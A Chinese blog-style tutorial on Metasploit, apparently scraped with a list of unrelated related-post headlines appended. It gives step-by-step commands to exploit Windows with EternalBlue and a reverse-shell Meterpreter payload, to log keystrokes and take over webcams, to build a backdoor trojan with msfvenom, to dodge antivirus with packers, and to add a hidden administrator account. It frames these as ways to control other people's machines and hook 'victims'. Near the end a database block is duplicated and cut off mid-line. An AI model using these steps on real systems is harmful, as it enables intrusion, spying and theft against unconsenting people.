渗透测试神器之metasploit

metasploit是什么?

msf是一款开源安全漏洞利用和测试工具,继承了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。

metasploit让复杂的漏洞攻击流程变得非常的简单,一个电脑小白经过几个小时的学习,就能对操作系统等主流漏洞发起危害性攻击。

metasploit攻击windows系统

msfconsole:启动metasploit命令行(命令行效率高,使用方便)

启动metasploit前需要做:

  • 打开kali终端
  • 使用sudo su命令,并输入kali的密码kali,切换至root用户(建议kali直接使用root登录)
  • 使用msfdb init命令,初始化建议kali直接使用root登录。数据库(*可选)

msf使用法则:

  • 使用模块 - use[module name]
  • 配置模块必选项 - set [opthin name] [value]
  • 运行模块 - run
  • 三步操作就能实现对主流漏洞的攻击

永恒之蓝

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

攻击流程

本次攻击以永恒之蓝为例:

metasploit攻击永恒之蓝全流程:

  1. 使用模块

    use exploit/windows/smb/ms17_010_eternalblue

    也可以使用对应的序号,例如 :use 0

  2. 设置必选项

    查看必选项[required为yes的就是必选项]

    show options

在目标winsdows系统上用ipconfig查看IP,并配置

set RHOSTS 192.168.206.138

rhosts为target host(s) 代表你想要攻击谁

set payload windows/x64/meterpreter/reverse_tcp

payload是攻击载荷,就是攻击完成后你想干啥,这里是想获取meterpreter

meterpreter是metasploit后渗透的神器

set LHOST 192.168.1.136

LHOST为listen host 代表你是谁,即kali的IP地址

set LPORT 12345

LPORT为listen port,代表你要在kali上开启的端口,1-65535随便选,但不能被占用

攻击前记得关闭目标主机的防火墙:

运行模块,完成攻击:

攻击成功后能做什么

meterpreter是强大的后渗透模块,可以输入help查看帮助信息

远程控制,命令执行,摄像头监控,密码获取,创建后门用户,破坏纂改……这些看起来非常复杂又高级的操作都能用meterpreter中的一些模块,一两个命令就可以完成了。

例如:开机键盘监听,开启摄像头

keyscan_start //开启键盘监听

keyscan_dump //到处键盘监听结果

keyscan_stop //结束键盘监听

run vnc //开启远程桌面

webcam_list //查看摄像头

webcam_snap //通过摄像头拍照

webcam_stream //通过摄像头开启视频

想要键盘监听就必须换身份

ps 查看进程

进程注入:

成功进行键盘监听:

开启远程桌面:

这样操作是非常卡的,一般进行远程控制我们会开启3389端口

虚拟机没有摄像头,我们暂时无法进行摄像头的控制

msfvenom生成后门木马

想要远程控制别人?msfvenom生成远控木马了解一下

msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。

msfvenom在shell里使用,不是msfconsole终端

windows可执行程序后门:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.136 lport=9999 -f exe -o demo.exe

不做免杀处理,木马文件很容易被安全软件删除掉。

生成木马就完事了?记得在msfconsole里开启监听,等待受害者运行上钩

进入监听模块:

不管发送什么木马都要在这个模块进行配置

通过show options 查看需要配置的参数:

配置payloads:set payload windows/x64/meterpreter/reverse_tcp

配置端口:

监听:

通过exploit监听会持续监听无法进行其他操作,而我们使用exploit -j就可以使之持续监听,并挂载在后台。

我们通过jobs就可以进行查看:

当客户端运行我们发送的木马时,我们就会收到成功的提示。

然后通过sessions查看,可以看到电脑的用户名。

之后通过session1/2/3等进行切换,我们换到有摄像头的主机后,可以进行摄像头的开启等操作,可以自己试一下。

杀毒软件会查杀怎么办?一招教你躲避火绒的探测

最基础的免杀(对于其他杀毒软件效果不同,具体情况自行尝试)

加壳:压缩壳,加密壳(Themida)

上钩以后怎么办?纂改破坏,监控,只要权限够,随心所欲

例:创建后面用户并开启远程连接

shellnet user zhangsan 123456 /add&& localgroup administrators zhangsan /addexitrun getuid -e
云服务器安装metasploit

为什么要用云服务器

kali在内网中,在实际渗透测试攻击过程中,如遇到需要反弹shell的情况,互联网中的靶机是无法连接至内网中的kali,故可以租赁一台又公网IP的云服务器作为攻击机

云服务器安装metasploit

安装MSF:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb>msfinstall && chmod 755 msfinstall && ./msfinstall

postgres=# CREATE USER msf WITH PASSWORD ‘msf’;

postgres=# CREATE DATABASE msf OWNER msf;

postgres=# ALTER ROLE msf LOGIN

postgres=# \du 查看用户

postgres=# \d 列出当前数据库表

postgres=# \l 查看数据库

postgres=#\q 退出

postgres=#\c msf 切换数据库

SWORD ‘msf’;

postgres=# CREATE DATABASE msf OWNER msf;

postgres=# ALTER ROLE msf LOGIN

postgres=# \du 查看用户

postgres=# \d 列出当前数据库表

postgres=# \l 查看数据库

postgres=#\q 退出

postgres=#\c msf 切换数据库

渗透测试神器之metasploit相关推荐

  1. APP稳定性测试神器之Monkey-随机事件测试

    APP稳定性测试神器之Monkey-随机事件测试 Monkey是Android中的一个命令行工具,可以运行在模拟器里或者现实设备中,向系统发送伪随机的用户事件流(点击.滑动.Application切换 ...

  2. Kali渗透测试:使用Metasploit对Web应用的攻击

    Kali渗透测试:使用Metasploit对Web应用的攻击 Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下.这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从 ...

  3. Kali Linux渗透测试小实践——Metasploit与后门木马

    一.环境和工具准备 1.Metasploit Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的 ...

  4. Kali渗透测试——快速查找Metasploit的模块

    快速查找Metasploit的模块 在渗透测试过程中,通过NMAP可以获取目标主机服务和操作系统信息:通过Nessus和OpenVAS可以获取目标主机存在的漏洞:或者,通过其他工具获取到关键信息.这时 ...

  5. Metasploit(MSF)渗透测试框架使用教程及基本命令

    第一章 Metasploit渗透框架介绍及体系框架 1.1 Metasploit 渗透测试框架介绍   Metasploit 是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一.使您能够 ...

  6. Metasploit渗透测试框架简介

    Metasploit渗透测试框架介绍 Metasploit是一个免费的.可下载的框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击.它本身附带数百个已知软件漏洞的专业级漏洞攻击工具.当H.D ...

  7. 《Metasploit 魔鬼训练营》04 Web 应用渗透测试

    本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程 OWASP Web 漏洞 TOP 10 基于 Metasploit 框架的 Web 应用渗透技术 Web 应用 ...

  8. 《Metasploit渗透测试手册》目录—导读

    版权声明 Metasploit渗透测试手册 Copyright © Packt Publishing 2012. First published in the English language und ...

  9. Kali Linux 和 渗透测试

    From:http://www.anquan.us/static/drops/tips-826.html 作为一个渗透测试学习者必知必读的好书推荐:https://zhuanlan.zhihu.com ...

最新文章

  1. 使用wireshark分析TLSv2(详细)
  2. 记录由Equal基础知识引起的内存泄露
  3. jqprintsetup已经安装还会提示_英雄联盟PBE服务器安装指南 抢先体验新模式“云顶之弈”不用等...
  4. 【生活】1024,快乐
  5. JZOJ 5452. 【NOIP2017提高A组冲刺11.5】轰炸
  6. python3随记——字符编码
  7. 沫沫金Echarts移动端demo
  8. oracle 论坛 千万级表,Oracle千万级记录操作总结
  9. saltstack自动化运维系列②之saltstack的数据系统
  10. 在大公司天天调参数,感觉快废了
  11. 定点数和浮点数_Simulink模型中定点数的介绍
  12. 穷举法求最大公共子序列C语言,算法--最长公共子序列(LongestCommon Subsequence, LCS)...
  13. centos7 mysql5.6.35_Centos7.2.1511 编译安装Mysql5.6.35
  14. 1949-2017闰年 c语言,C语言编写方案-万年历选编.doc
  15. QPointer、QScopedPointer、QSharedDataPointer等指针用法总结
  16. 安装rocky8.5
  17. 程序员月薪5W却发出哀叹:家庭枷锁太重,生活如同围城
  18. 运动目标检测--背景减法
  19. 微软project服务器搭建,Project Server 2013 安装和部署概述
  20. 大场景室内点云标注数据集S3DIS介绍

热门文章

  1. 从AFX_MANAGE_STATE(AfxGetStaticModuleState())说起
  2. 边缘之战鸣枪 新华三蓄势待发
  3. Linux-C 简单的C语言日志库
  4. PHP 数组基本概念
  5. Unity3d 根据布线,自动生成碰撞墙
  6. Win7下虚拟机安装Mac OS X
  7. java 51_学习java第51天
  8. 软件质量模型(ISO/IEC 9126和Mc Call)
  9. 回收站被清空还能否找回文件
  10. 泛微某oa系统ssrf漏洞分析